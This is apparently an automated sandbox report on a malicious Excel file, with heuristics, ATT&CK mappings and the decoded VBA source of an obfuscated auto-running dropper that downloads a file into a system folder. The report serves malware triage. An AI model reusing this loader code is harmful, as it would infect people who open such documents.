Verdict: MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The critical heuristics indicate that the VBA macros within this Excel file are obfuscated and designed to download and execute a file from the internet. The Workbook_Open macro is automatically executed upon opening the document, initiating the malicious process. The ClamAV detection further confirms its malicious nature as a dropper.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-1822094 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1822094
- VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- VBA downloads and writes a file to disk [critical] (OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `.Write sC_S65IyAP_.responseBody`
- Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set YZXRv0LAG = CreateObject(fsOY4M0AW(ekCJo8Ot))`
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set YZXRv0LAG = CreateObject(fsOY4M0AW(ekCJo8Ot))`
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro [low] (OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `Sub Workbook_Open()`
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32757 bytes |

SHA-256: 5b217dd2f4e1590d94c8e6a548b1abb1dddb654210ff8b5a60051e99f6a305a7

Detection (for this artifact):
- ClamAV: No threats found
- Obfuscation or payload: likely. 360 of 571 identifiers look randomly generated (e.g. 'ovZmlBFIZohQyAVyCbvJwjJgfHoG'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
AM6Ak5ZWT
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private Sub RJiLqaVKfVMak()
End Sub
Private Sub sTqCQyPBFgT()
End Sub
Private Sub OmHgm DUbtQwIEdbCx()
End Sub
Private Sub dwqgLUUTZJCJ()
End Sub
Private Function gAuiMy()
End Function
Public Function QoXvuj6OR()
End Function
Private Sub PifCYwplwNcxlvS()
End Sub
Public Function PelCKb()
End Function
Public Function btZMnI0O()
End Function
Private Sub vsboNN()
End Sub
Public Sub mFlJbBbnhyiE()
End Sub
Public Sub BMetABLjeHJ()
End Sub
Private Function Zegm()
End Function
Public Function AcAh1AtVqmp()
End Function
Public Sub IrreeFNbCQ()
End Sub
Private Sub DspjByUE()
End Sub
Private Sub duvQSczgJaGMgo()
End Sub
Private Function o5UlfhKg()
End Function
Private Function iHo()
End Function
Private Function EYUYCnA()
End Function
Public Function DUbtQwIEdb()
End Function
Private Function D1Nrv()
End Function
Private Sub UTZJCJoBAQTQOn()
End Sub
Private Sub NPkMQf()
End Sub
Public Sub KxZvtVDUGKlKVPi()
End Sub
Attribute VB_Name = "Module2"
Public Sub CHVgA()
End Sub
Private Sub OlkLtKxB()
End Sub
Public Function XUyuky1Awcj()
End Function
Private Sub hjPkpxmRbca()
End Sub
Public Sub QuHGQbeUuJBm()
End Sub
Private Function Xim5m4ALOs()
End Function
Private Sub dQpYvf NAbv7?N2?lqs()
End Sub
Private Sub xzgmFNDjeediSa()
End Sub
Private Sub Yn arQmwQkZtkbo()
End Sub
Private Function qG2A()
End Function
Private Function lDaH5AB2O()
End Function
Private Function tvaMYsmb()
End Function
Public Function jc gpWudQuwo()
End Function
Public Sub FApJArEPyxlQyUh()
End Sub
Private Function uHaV()
End Function
Public Function CTq4OR0AncbR()
End Function
Private Sub nQgzSmhVB()
End Sub
Public Sub OzsAerqGKMEe()
End Sub
Private Function couprUq0Yv()
End Function
Private Sub BbBMGZVsO()
End Sub
Public Function nDSoc()
End Function
Private Function hjPkpxmRbca Lki4?4M0A()
End Function
Public Sub UuJBmySvzNJsGg()
End Sub
Attribute VB_Name = "Module3"
Public Function PlyBtgIdZ()
End Function
Public Sub kvpHqMwHNJUm()
End Sub
Public Sub TrmPRxEYfUAv()
End Sub
Public Function tTQF()
End Function
Private Sub UCrLBsGQzzmmNVj()
End Sub
Public Sub izLAxrJGeNYe()
End Sub
Private Sub DZbkHoRiOUo()
End Sub
Public Function JmYk()
End Function
Private Sub QSHcRIQ()
End Sub
Private Sub CpQnzNvMyCcQN()
End Sub
Private Function H4OQ()
End Function
Private Sub yoTddchRKRw()
End Sub
Private Sub cfQvKDnVYsUZnxS()
End Sub
Private Sub hDBeLdOStSe()
End Sub
Public Function UCMIhSGFyy()
End Function
Private Function T4?Zh()
End Function
Private Sub TbiMaZpsvn()
End Sub
Private Sub DmoIlqDAjwVVxF()
End Sub
Private Sub tRjJkvpHqMwHN()
End Sub
Private Function UfwdQ7OIHvL()
End Function
Public Sub YfUAvwuzlry()
End Sub
Public Sub FvypOrQU()
End Sub
Public Sub BsGQzzmmNVjKf()
End Sub
Attribute VB_Name = "Module4"
Public Function hZvXd4aE()
End Function
Public Sub GEJuBIZzzOE()
End Sub
Public Function Yjo()
End Function
Private Sub oTrJVJHBTQnQin()
End Sub
Public Sub NjktRycrYexFv()
End Sub
Public Sub UaKDKpQBRVYPpRw()
End Sub
Public Sub lcShraZMyawIQE()
End Sub
Private Sub maYRkhDayEALO()
End Sub
Private Sub KTOsHbuNIx()
End Sub
Private Sub lqbUcFS()
End Sub
Public Sub ogFUMxf()
End Sub
Private Function hUE()
End Function
Private Function MQtf7O()
End Function
Private Function AyVTtsjjo()
End Function
Private Sub OuCDBGelsVjiyCF()
End Sub
Public Sub eNvySvz()
End Sub
Private Function tn7aBKqP()
End Function
Public Sub tEyQAQGQQSfwKS()
End Sub
Public Sub vZbHNhpfKF()
End Sub
Private Sub uBIZzzOEHzZB()
End Sub
Private Sub AULCPbJIwwYgs()
End Sub
Public Sub rJVJHBTQnQinkv()
End Sub
Public Sub ktRycr()
End Sub
Private Sub FvbVQUaKDK()
End Sub
Private Function kwhdgKyIbW()
End Function
Public Function jCZrQ0I5a()
End Function
Public Function LO1E()
End Function
Public Function DWRFhS2ara()
End Function
Attribute VB_Name = "Module5"
Public Function XHy8Iviu2a()
End Function
Public Function LnKU()
End Function
Public Function DFgCwB5Oqsq()
End Function
Private Function XDMtS()
End Function
Private Sub irPJnpVqv()
End Sub
Private Function iih buTNehkcA()
End Function
Public Sub adxaespYl()
End Sub
Public Sub uGjCiGY()
End Sub
Private Function vm0LeZbpak()
End Function
Public Function TCoYNMC0OsN()
End Function
Private Function TCHq5U6aULah()
End Function
Private Function N7?ubAiI()
End Function
Private Sub emzbuayPcQN()
End Sub
Private Function EORu5Upiu()
End Function
Private Sub MBhddbgRKRw()
End Sub
Private Function mycB()
End Function
Private Sub hCPeLdOSshe()
End Sub
Public Sub KgEKGSV()
End Sub
Private Function ER6I()
End Function
Attribute VB_Name = "Module6"
Public Function Rh7YK()
End Function
Private Sub zSbPvrrqu()
End Sub
Private Function LjSrpQP()
End Function
Public Function fQ5Y()
End Function
Private Function qsIrDI0aHqf()
End Function
Private Sub mEBZISZUh()
End Sub
Public Function jNMbhwGY()
End Function
Public Sub pwbBnDGJB()
End Sub
Private Function KPK2?ENtSBaDmmaLnJVk()
End Function
Private Sub ZznlfwuQmKQMZcq()
End Sub
Private Function VVbqiAHn()
End Function
Private Sub gfvyBtShaKsuOr()
End Sub
Public Sub pCqcDaZAizlpPq()
End Sub
Private Function GYEE()
End Function
Public Function wdQ7Aondd()
End Function
Public Function BHCEgDNfL()
End Function
Public Sub sTdpQlPoG()
End Sub
Private Sub LeMkTekgsIYfhq()
End Sub
Private Function RPpoesjAr()
End Function
Private Function lOkyAtgI()
End Function
Private Sub iZOdnVVIJktFi()
End Sub
Private Function FEttl()
End Function
Public Function XSU()
End Function
Public Function wUCM1E7UGF()
End Function
Public Sub BfJtp()
End Sub
Private Sub gtDmmaLn()
End Sub
Attribute VB_Name = "Module7"
Public Sub oIlpDNj()
End Sub
Public Function WkbqwOWnLr()
End Function
Public Function l4?I8E()
End Function
Private Sub AJJINkrydqpFILD()
End Sub
Public Sub TCEZBGT()
End Sub
Public Sub mmNVjKeJizazK()
End Sub
Public Function llqsKMoLVo()
End Function
Public Sub hNUnvl()
End Sub
Private Sub KPAHOfGFVLOFf()
End Sub
Private Function AZXwv()
End Function
Public Sub CemzbuayPcQ()
End Sub
Public Function t3?I()
End Function
Public Function rtWsEJCoQk()
End Function
Public Sub GzGlLxNQTLkNscY()
End Sub
Public Sub NcmUUIuVsESARDH()
End Sub
Public Sub MfczUtzvHKZuwF()
End Sub
Private Sub DVqJDtZi()
End Sub
Private Sub QPQBONe()
End Sub
Public Function acFbmqjX()
End Function
Public Sub fsCYl()
End Sub
Public Sub IHjQiTY()
End Sub
Private Function nON0ahtOIK()
End Function
Private Function VeLjSroQP()
End Function
Attribute VB_Name = "Module8"
Public Function es6OpjlO6Am()
End Function
Public Sub gzfCUuUgasc()
End Sub
Public Function Pc3ImhVgDk()
End Function
Private Function J6aq4OR3A()
End Function
Private Sub bbrhjbAdHF()
End Sub
Private Function AKN7IWleu()
End Function
Public Function UEBTfFDrq()
End Function
Private Sub JOLQopKLUt()
End Sub
Public Function ZLXqlZCmjC()
End Function
Public Sub xzrQtYIEs()
End Sub
Public Function MPHsF()
End Function
Public Sub enq3UgcnqF()
End Sub
Public Function u2AkHRkP0aT()
End Function
Public Sub NOMRCwDhutJ()
End Sub
Public Function oEyNUB1AFwk()
End Function
Private Function UJIwwpFL()
End Function
Private Function YBXimf()
End Function
Public Sub SGPniLNuOT()
End Sub
Public Function ljKJs()
End Function
Public Function FG2A()
End Function
Public Sub jKSfHbG()
End Sub
Attribute VB_Name = "Module9"
Private Sub CeydBTfT()
End Sub
Private Sub axhrx()
End Sub
Public Sub QsuDbHlBioHPEkg()
End Sub
Public Sub UNUzaLc()
End Sub
Private Function vF4?DIB()
End Function
Private Function QXEGShOgRV()
End Function
Private Function eZNp()
End Function
Private Sub X0CtSrwwvAlelPdc()
End Sub
Private Sub qOeQGprLot()
End Sub
Private Sub znZAQVx()
End Sub
Private Sub mMmxrJ()
End Sub
Public Function ucAi1OF()
End Function
Private Sub AUaiYDMNLQouBg()
End Sub
Public Function fVVbqiA1?()
End Function
Private Function y5?EERmv0?k()
End Function
Private Sub MeEfqkCl()
End Sub
Private Sub IEPh Rh7YKK()
End Sub
Attribute VB_Name = "Module10"
Private Sub BEwUydbIxRIzM()
End Sub
Public Function q8?SPh2UA()
End Function
Public Function vsy7E3Oql()
End Function
Public Sub NvZoUbuC()
End Sub
Public Sub TRQHAHmMyORUMl()
End Sub
Private Function QmwQyiKea()
End Function
Public Function PcU6YUWg()
End Function
Public Sub VvAxILbwxG()
End Sub
Public Function fkdQrN()
End Function
Public Function neeVkrIQh()
End Function
Public Function OTM()
End Function
Private Sub gtEZm()
End Sub
Private Sub JIkRjUa()
End Sub
Public Sub fxuQnLD()
End Sub
Public Sub rMAJh()
End Sub
Private Sub oHNVKqzAyDbh()
End Sub
Private Function SPqpffkmsJ()
End Function
Private Sub suPrwKGpDcdD()
End Sub
Public Function Bl8OLt3Id4Ng()
End Function
Private Sub TPcsHOQaxsVYE()
End Sub
Private Sub bHCCBGr()
End Sub
Attribute VB_Name = "Module11"
Public Sub kHoRi()
End Sub
Private Sub wlQMMLPB()
End Sub
Public Function BH0UiOXE()
End Function
Public Sub QSHcRIQPPCpQn()
End Sub
Public Function LwZu7aM()
End Function
Private Sub uqCFTprA()
End Sub
Private Sub yQlEyo()
End Sub
Private Sub chRKR()
End Sub
Private Function J4IZpwP()
End Function
Private Function yBtgIdYc()
End Function
Private Sub SeYqnKgEx()
End Sub
Private Function kFtD T4?Zh()
End Function
Public Sub wCJoBAQTQOoCvgN()
End Sub
Private Function iTeicP()
End Function
Public Function cUjbG()
End Function
Private Sub wNdkmvS()
End Sub
Public Sub agzHwcYYV()
End Sub
Public Sub arRQhQaRqTyweS()
End Sub
Public Function RCM()
End Function
Private Sub SliFp TVwU5AbKLj()
End Sub
Private Function ucQAon()
End Function
Private Sub TknqiG()
End Sub
Public Sub ujDtkyIrre()
End Sub
Public Sub bpQoaeEspjByV()
End Sub
Private Function WIUniWAjgK()
End Function
Private Function fsOXa1U6A()
End Function
Private Function sJQ()
End Function
Private Function S2OLtTQFE()
End Function
Attribute VB_Name = "Module12"
Public Function qsHrDH0IHqe()
End Function
Public Sub rtNqvIFoBbbC()
End Sub
Private Sub TyQoOpAuMv()
End Sub
Private Sub SOarGNPZwrUQD()
End Sub
Public Sub aFBBAEq()
End Sub
Public Sub vuKADvTxcaHwQG()
End Sub
Public Sub EErrScoPkOnFQFC()
End Sub
Public Sub jSdjfrHIegpMu()
End Sub
Private Sub atBqVRRQVGzGlL()
End Sub
Public Function iNLahwGX()
End Function
Private Sub VsESARDHi()
End Sub
Public Sub fczUtzvHKZuwF()
End Sub
Private Function XpVViEO()
End Function
Public Sub hkcAP()
End Sub
Private Function VVapiuYI()
End Function
Public Sub AmNkjKsJvzaAL()
End Sub
Attribute VB_Name = "Module13"
Private Const WOlM3al = "Ј№™›�№Сљ‡љ"
Private Const Jfp1OUtrS = "¬—љ““СѕЏЏ“–њћ‹–ђ‘"
Private Const FsToknf = "ѕ»°»ЅС¬‹Ќљћ’"
Private Const bPO7ajuP = "¬њЌ–Џ‹–‘�С№–“љ¬†Њ‹љ’°ќ•љњ‹"
Private Const bPrcZrXY = "ёє«"
Private Const eBSZrP = "І¬§ІіНС§Іі·««Ї"
Private Const UHVpAD6O = WOlM3al
Private Const lLJ = "—‹‹ЏЕРР—Љ’’љ“ТНЖС›љР•ЊРќ–‘Сљ‡љ"
Private Const ekCJo8Ot = bPO7ajuP
Sub AM6Ak5ZWT()
Dim YZXRv0LAG, gmkGo6q
GoTo JuovZmlBFIzZohQyAV
Dim QbvJwjJgf As Integer
For QbvJwjJgf = 0 To 0
If QbvJwjJgf = 5 Then End
Next QbvJwjJgf
Dim ZbSsUz As Integer
For ZbSsUz = 0 To 0
If ZbSsUz = 5 Then End
Next ZbSsUz
Dim DAQtRY As Integer
For DAQtRY = 0 To 0
If DAQtRY = 5 Then End
Next DAQtRY
JuovZmlBFIzZohQyAV:
Set YZXRv0LAG = CreateObject(fsOY4M0AW(ekCJo8Ot))
GoTo ExhORmOShdMazzbj
Dim rQuMmMYRkTqa As Integer
For rQuMmMYRkTqa = 0 To 0
If rQuMmMYRkTqa = 5 Then End
Next rQuMmMYRkTqa
Dim pcgFtrlDAQtR As Integer
For pcgFtrlDAQtR = 0 To 0
If pcgFtrlDAQtR = 5 Then End
Next pcgFtrlDAQtR
Dim OShdMa As Integer
For OShdMa = 0 To 0
If OShdMa = 5 Then End
Next OShdMa
ExhORmOShdMazzbj:
Dim ijnK2g, j_YLrCc1S, fz21trwt
Const rihuZ61esFi = 2
GoTo crYpcgFtrlDAQtRYTfi
Dim TeniLbuOhcQ As Integer
For TeniLbuOhcQ = 0 To 0
If TeniLbuOhcQ = 5 Then End
Next TeniLbuOhcQ
Dim zLoHnKd As Integer
For zLoHnKd = 0 To 0
If zLoHnKd = 5 Then End
Next zLoHnKd
Dim wjJgfHoGsw As Integer
For wjJgfHoGsw = 0 To 0
If wjJgfHoGsw = 5 Then End
Next wjJgfHoGsw
crYpcgFtrlDAQtRYTfi:
Set ijnK2g = YZXRv0LAG.GetSpecialFolder(rihuZ61esFi)
GoTo YTfixSTeniLbuOhcQxFG
Dim uovZmlBFIz As Integer
For uovZmlBFIz = 0 To 0
If uovZmlBFIz = 5 Then End
Next uovZmlBFIz
Dim aYdNUcsSSiZb As Integer
For aYdNUcsSSiZb = 0 To 0
If aYdNUcsSSiZb = 5 Then End
Next aYdNUcsSSiZb
Dim ovZmlBFIZohQyAVyCbvJwjJgfHoG As Integer
For ovZmlBFIZohQyAVyCbvJwjJgfHoG = 0 To 0
If ovZmlBFIZohQyAVyCbvJwjJgfHoG = 5 Then End
Next ovZmlBFIZohQyAVyCbvJwjJgfHoG
YTfixSTeniLbuOhcQxFG:
dfggg = fsOY4M0AW(lLJ)
GoTo vKrxQZOupqoteQfIkUlp
Dim IlPAwkvmAKtsgSt As Integer
For IlPAwkvmAKtsgSt = 0 To 0
If IlPAwkvmAKtsgSt = 5 Then End
Next IlPAwkvmAKtsgSt
Dim csSSiZbSsUzx As Integer
For csSSiZbSsUzx = 0 To 0
If csSSiZbSsUzx = 5 Then End
Next csSSiZbSsUzx
Dim GswVwHBQnJiaViyNjQg As Integer
For GswVwHBQnJiaViyNjQg = 0 To 0
If GswVwHBQnJiaViyNjQg = 5 Then End
Next GswVwHBQnJiaViyNjQg
vKrxQZOupqoteQfIkUlp:
FgKJHofd = ijnK2g & fsOY4M0AW(UHVpAD6O)
GoTo trlDAQtRYTfixSTeni
Dim uOhcQFGEJuovZ As Integer
For uOhcQFGEJuovZ = 0 To 0
If uOhcQFGEJuovZ = 5 Then End
Next uOhcQFGEJuovZ
Dim hCDMl As Integer
For hCDMl = 0 To 0
If hCDMl = 5 Then End
Next hCDMl
Dim QnCYLUsnQS As Integer
For QnCYLUsnQS = 0 To 0
If QnCYLUsnQS = 5 Then End
Next QnCYLUsnQS
trlDAQtRYTfixSTeni:
Set sC_S65IyAP_ = CreateObject(fsOY4M0AW(eBSZrP))
sC_S65IyAP_.Open fsOY4M0AW(bPrcZrXY), dfggg, False
sC_S65IyAP_.send
Set hxuWnpbqBtp4u = CreateObject(fsOY4M0AW(ekCJo8Ot))
GoTo zgmFNDjefdiSLSxY
Dim dgYxa As Integer
For dgYxa = 0 To 0
If dgYxa = 5 Then End
Next dgYxa
Dim AerqGKM As Integer
For AerqGKM = 0 To 0
If AerqGKM = 5 Then End
…